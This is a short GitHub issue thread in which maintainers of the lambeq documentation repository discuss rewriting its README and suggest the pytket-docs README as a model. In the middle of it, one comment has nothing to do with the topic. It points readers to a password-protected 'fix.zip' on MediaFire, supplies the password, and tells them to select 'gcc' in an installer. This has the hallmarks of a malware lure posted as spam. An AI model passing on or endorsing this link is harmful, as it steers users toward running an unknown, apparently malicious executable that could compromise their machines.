### ISSUE TITLE
Update Readme

### ISSUE THREAD

**Issue by dimkart** [CQCL/lambeq-docs#1]
We'll need to put something more meaningful there, perhaps lambeq repo's readme with some extra text on top that this states this is just the docs?

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by neiljdo** [comment]
Something similar to https://github.com/CQCL/pytket-docs/blob/main/README.md perhaps?
